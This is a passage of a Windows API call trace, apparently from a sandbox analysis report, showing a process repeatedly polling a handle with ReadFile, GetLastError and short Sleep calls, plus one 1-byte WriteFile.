	[0205.812] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.812] GetLastError () returned 0x218
	[0205.812] Sleep (dwMilliseconds=0xa) 
	[0205.828] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.828] GetLastError () returned 0x218
	[0205.828] Sleep (dwMilliseconds=0xa) 
	[0205.843] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.843] GetLastError () returned 0x218
	[0205.843] Sleep (dwMilliseconds=0xa) 
	[0205.858] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.859] GetLastError () returned 0x218
	[0205.859] Sleep (dwMilliseconds=0xa) 
	[0205.874] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.874] GetLastError () returned 0x218
	[0205.874] Sleep (dwMilliseconds=0xa) 
	[0205.890] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.890] GetLastError () returned 0x218
	[0205.890] Sleep (dwMilliseconds=0xa) 
	[0205.939] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.939] GetLastError () returned 0x218
	[0205.939] Sleep (dwMilliseconds=0xa) 
	[0205.983] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.983] GetLastError () returned 0x218
	[0205.983] Sleep (dwMilliseconds=0xa) 
	[0206.005] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.005] GetLastError () returned 0x218
	[0206.005] Sleep (dwMilliseconds=0xa) 
	[0206.014] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.014] GetLastError () returned 0x218
	[0206.014] Sleep (dwMilliseconds=0xa) 
	[0206.061] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.061] GetLastError () returned 0x218
	[0206.061] Sleep (dwMilliseconds=0xa) 
	[0206.077] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.077] GetLastError () returned 0x218
	[0206.077] Sleep (dwMilliseconds=0xa) 
	[0206.092] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.092] GetLastError () returned 0x218
	[0206.092] Sleep (dwMilliseconds=0xa) 
	[0206.108] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.108] GetLastError () returned 0x218
	[0206.108] Sleep (dwMilliseconds=0xa) 
	[0206.158] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.158] GetLastError () returned 0x218
	[0206.158] Sleep (dwMilliseconds=0xa) 
	[0206.201] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.201] GetLastError () returned 0x218
	[0206.201] Sleep (dwMilliseconds=0xa) 
	[0206.222] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.222] GetLastError () returned 0x218
	[0206.223] Sleep (dwMilliseconds=0xa) 
	[0206.232] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.232] GetLastError () returned 0x218
	[0206.233] Sleep (dwMilliseconds=0xa) 
	[0206.248] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.249] GetLastError () returned 0x218
	[0206.249] Sleep (dwMilliseconds=0xa) 
	[0206.264] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.264] GetLastError () returned 0x218
	[0206.264] Sleep (dwMilliseconds=0xa) 
	[0206.280] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.280] GetLastError () returned 0x218
	[0206.280] Sleep (dwMilliseconds=0xa) 
	[0206.311] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.311] GetLastError () returned 0x218
	[0206.311] Sleep (dwMilliseconds=0xa) 
	[0206.326] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.326] GetLastError () returned 0x218
	[0206.326] Sleep (dwMilliseconds=0xa) 
	[0206.373] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.373] GetLastError () returned 0x218
	[0206.373] Sleep (dwMilliseconds=0xa) 
	[0206.439] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.439] GetLastError () returned 0x218
	[0206.439] Sleep (dwMilliseconds=0xa) 
	[0206.455] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.455] GetLastError () returned 0x218
	[0206.455] Sleep (dwMilliseconds=0xa) 
	[0206.467] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.467] GetLastError () returned 0x218
	[0206.467] Sleep (dwMilliseconds=0xa) 
	[0206.488] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.488] GetLastError () returned 0x218
	[0206.489] Sleep (dwMilliseconds=0xa) 
	[0206.498] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.498] GetLastError () returned 0x218
	[0206.498] Sleep (dwMilliseconds=0xa) 
	[0206.514] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.514] GetLastError () returned 0x218
	[0206.514] Sleep (dwMilliseconds=0xa) 
	[0206.529] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.529] GetLastError () returned 0x218
	[0206.529] Sleep (dwMilliseconds=0xa) 
	[0206.545] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.545] GetLastError () returned 0x218
	[0206.545] Sleep (dwMilliseconds=0xa) 
	[0206.560] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.561] GetLastError () returned 0x218
	[0206.561] Sleep (dwMilliseconds=0xa) 
	[0206.607] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.607] GetLastError () returned 0x218
	[0206.607] Sleep (dwMilliseconds=0xa) 
	[0206.654] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.654] GetLastError () returned 0x218
	[0206.654] Sleep (dwMilliseconds=0xa) 
	[0206.681] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.681] GetLastError () returned 0x218
	[0206.681] Sleep (dwMilliseconds=0xa) 
	[0206.685] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.685] GetLastError () returned 0x218
	[0206.685] Sleep (dwMilliseconds=0xa) 
	[0206.701] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.701] GetLastError () returned 0x218
	[0206.701] Sleep (dwMilliseconds=0xa) 
	[0206.716] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0206.716] GetLastError () returned 0x218
	[0206.716] Sleep (dwMilliseconds=0x3e8) 
	[0208.649] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0208.649] Sleep (dwMilliseconds=0xa) 
	[0208.658] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0208.800] GetLastError () returned 0x218
	[0208.800] Sleep (dwMilliseconds=0xa) 
	[0208.807] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0208.807] GetLastError () returned 0x218
	[0208.807] Sleep (dwMilliseconds=0xa) 
	[0208.823] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0208.823] GetLastError () returned 0x218
	[0208.823] Sleep (dwMilliseconds=0xa) 
	[0208.838] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0208.838] GetLastError () returned 0x218
	[0208.838] Sleep (dwMilliseconds=0xa) 
	[0208.901] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0208.901] GetLastError () returned 0x218
	[0208.901] Sleep (dwMilliseconds=0xa) 
	[0209.056] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.056] GetLastError () returned 0x218
	[0209.056] Sleep (dwMilliseconds=0xa) 
	[0209.144] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.144] GetLastError () returned 0x218
	[0209.144] Sleep (dwMilliseconds=0xa) 
	[0209.150] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.150] GetLastError () returned 0x218
	[0209.150] Sleep (dwMilliseconds=0xa) 
	[0209.171] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.171] GetLastError () returned 0x218
	[0209.171] Sleep (dwMilliseconds=0xa) 
	[0209.181] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.181] GetLastError () returned 0x218
	[0209.181] Sleep (dwMilliseconds=0xa) 
	[0209.197] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.197] GetLastError () returned 0x218
	[0209.197] Sleep (dwMilliseconds=0xa) 
	[0209.244] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.244] GetLastError () returned 0x218
	[0209.244] Sleep (dwMilliseconds=0xa) 
	[0209.290] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.290] GetLastError () returned 0x218
	[0209.290] Sleep (dwMilliseconds=0xa) 
	[0209.322] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.322] GetLastError () returned 0x218
	[0209.322] Sleep (dwMilliseconds=0xa) 
	[0209.337] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.337] GetLastError () returned 0x218
	[0209.337] Sleep (dwMilliseconds=0xa) 
	[0209.353] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.353] GetLastError () returned 0x218
	[0209.353] Sleep (dwMilliseconds=0xa) 
	[0209.369] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.369] GetLastError () returned 0x218
	[0209.369] Sleep (dwMilliseconds=0xa) 
	[0209.384] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.384] GetLastError () returned 0x218
	[0209.384] Sleep (dwMilliseconds=0xa) 
	[0209.399] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.400] GetLastError () returned 0x218
	[0209.400] Sleep (dwMilliseconds=0xa) 
	[0209.427] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.427] GetLastError () returned 0x218
	[0209.427] Sleep (dwMilliseconds=0xa) 
	[0209.431] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.431] GetLastError () returned 0x218
	[0209.431] Sleep (dwMilliseconds=0xa) 
	[0209.478] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.478] GetLastError () returned 0x218
	[0209.478] Sleep (dwMilliseconds=0xa) 
	[0209.525] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.525] GetLastError () returned 0x218
	[0209.525] Sleep (dwMilliseconds=0xa) 
	[0209.540] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.540] GetLastError () returned 0x218
	[0209.540] Sleep (dwMilliseconds=0xa) 
	[0209.555] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.555] GetLastError () returned 0x218
	[0209.556] Sleep (dwMilliseconds=0xa) 
	[0209.571] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.572] GetLastError () returned 0x218
	[0209.572] Sleep (dwMilliseconds=0xa) 
	[0209.588] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.588] GetLastError () returned 0x218
	[0209.588] Sleep (dwMilliseconds=0xa) 
	[0209.603] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.603] GetLastError () returned 0x218
	[0209.603] Sleep (dwMilliseconds=0xa) 
	[0209.639] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.639] GetLastError () returned 0x218
	[0209.639] Sleep (dwMilliseconds=0xa) 
	[0209.680] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.680] GetLastError () returned 0x218
	[0209.680] Sleep (dwMilliseconds=0xa) 
	[0209.719] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.719] GetLastError () returned 0x218
	[0209.719] Sleep (dwMilliseconds=0xa) 
	[0209.748] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.748] GetLastError () returned 0x218
	[0209.748] Sleep (dwMilliseconds=0xa) 
	[0209.758] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.758] GetLastError () returned 0x218
	[0209.758] Sleep (dwMilliseconds=0xa) 
	[0209.774] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.774] GetLastError () returned 0x218
	[0209.774] Sleep (dwMilliseconds=0xa) 
	[0209.789] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.789] GetLastError () returned 0x218
	[0209.790] Sleep (dwMilliseconds=0xa) 
	[0209.806] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.806] GetLastError () returned 0x218
	[0209.806] Sleep (dwMilliseconds=0xa) 
	[0209.821] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.821] GetLastError () returned 0x218
	[0209.821] Sleep (dwMilliseconds=0xa) 
	[0209.837] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.837] GetLastError () returned 0x218
	[0209.837] Sleep (dwMilliseconds=0xa) 
	[0209.852] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.852] GetLastError () returned 0x218
	[0209.853] Sleep (dwMilliseconds=0xa) 
	[0209.899] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.899] GetLastError () returned 0x218
